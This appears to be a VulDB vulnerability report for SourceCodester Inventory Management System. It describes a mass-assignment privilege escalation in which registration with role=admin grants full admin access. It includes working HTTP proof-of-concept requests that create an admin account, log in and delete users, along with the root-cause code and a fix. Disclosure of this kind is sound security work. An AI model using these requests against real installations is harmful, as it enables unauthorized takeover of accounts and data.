| عنوان | SourceCodester Inventory Management System NA Improper Access Controls |
|---|
| الوصف | Summary
The user registration endpoint at POST /api/users_handler.php accepts a role parameter directly from user input without server-side validation. Any unauthenticated visitor can register an account with role=admin, granting immediate access to the admin panel, user management (create/delete/modify users), and all administrative functions. No privileges, approval workflow, or additional verification is required.
Vulnerability Details
Vulnerability Type: Broken Access Control — Privilege Escalation via Mass Assignment
CVSS 3.1 Score: 9.8 (Critical) — AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Affected Endpoint: POST /api/users_handler.php with action=register
Vulnerable Parameter: role (line 38 of api/users_handler.php)
Steps to Reproduce
Environment:
- Target: http://localhost/Product_Inventory/
- Attacker: Unauthenticated (no account needed)
Steps:
1. Send the following request to register a new admin account:
POST /Product_Inventory/api/users_handler.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
action=register&username=attacker&password=attacker123&full_name=Attacker+User&role=admin
2. Observe the successful response:
{"success":true,"message":"User registered successfully!"}
3. Log in with the newly created admin account:
POST /Product_Inventory/api/users_handler.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
action=login&username=attacker&password=attacker123
4. Response confirms successful authentication:
{"success":true,"message":"Login successful!"}
5. Access admin-only endpoints (verified):
POST /Product_Inventory/api/users_handler.php HTTP/1.1
Host: localhost
Cookie: PHPSESSID=<session_cookie>
action=get_user&id=1
Response returns full admin user details:
{"id":1,"username":"admin","full_name":"GANESH DUTT","role":"admin"}
6. Modify or delete any user (verified):
POST /Product_Inventory/api/users_handler.php HTTP/1.1
Host: localhost
Cookie: PHPSESSID=<session_cookie>
action=delete_user&id=3
Response:
{"success":true,"message":"User deleted successfully!"}
Expected: Registration should only create staff accounts. Admin role should require existing admin approval or be hardcoded in the registration flow.
Actual: Any user can self-assign the admin role during registration.
Root Cause
The vulnerable code at api/users_handler.php:38 directly assigns the user-supplied role parameter:
$role = $_POST['role'] ?? 'staff';
This value is then inserted into the database without validation:
$stmt = $pdo->prepare("INSERT INTO users (username, password, full_name, role) VALUES (?, ?, ?, ?)");
$stmt->execute([$username, $hashed_password, $full_name, $role]);
Impact
An unauthenticated attacker can:
1. Create admin accounts — Register with role=admin to gain full administrative access
2. Delete any user — Remove legitimate admin accounts via delete_user action
3. Modify user credentials — Change passwords, usernames, and roles of any account via update_user
4. Access admin panel — View user management interface at users.php
5. Full system compromise — Combined with stored XSS vulnerabilities, achieve persistent admin session hijacking
This represents a complete authentication bypass. The attacker gains the highest privilege level in the application without any preconditions.
Recommended Fix
Remove the role parameter from user-controlled input during registration. Hardcode the default role:
case 'register':
$username = $_POST['username'] ?? '';
$password = $_POST['password'] ?? '';
$full_name = $_POST['full_name'] ?? '';
// FIX: Always assign 'staff' role during self-registration
$role = 'staff';
If admin account creation is needed, implement a separate endpoint protected by requireAdmin():
case 'create_admin':
requireAdmin();
$role = 'admin';
// ... rest of registration logic
Additionally, add server-side role validation as a defense-in-depth measure:
$allowed_roles = ['staff', 'admin'];
if (!in_array($role, $allowed_roles)) {
echo json_encode(['success' => false, 'message' => 'Invalid role.']);
exit;
} |
|---|
| المستخدم | Anonymous User |
|---|
| ارسال | 31/05/2026 04:23 PM (29 أيام منذ) |
|---|
| الاعتدال | 28/06/2026 08:22 PM (28 days later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 374576 [SourceCodester Inventory Management System 1.0 User Registration Endpoint /api/users_handler.php role تجاوز الصلاحيات] |
|---|
| النقاط | 17 |
|---|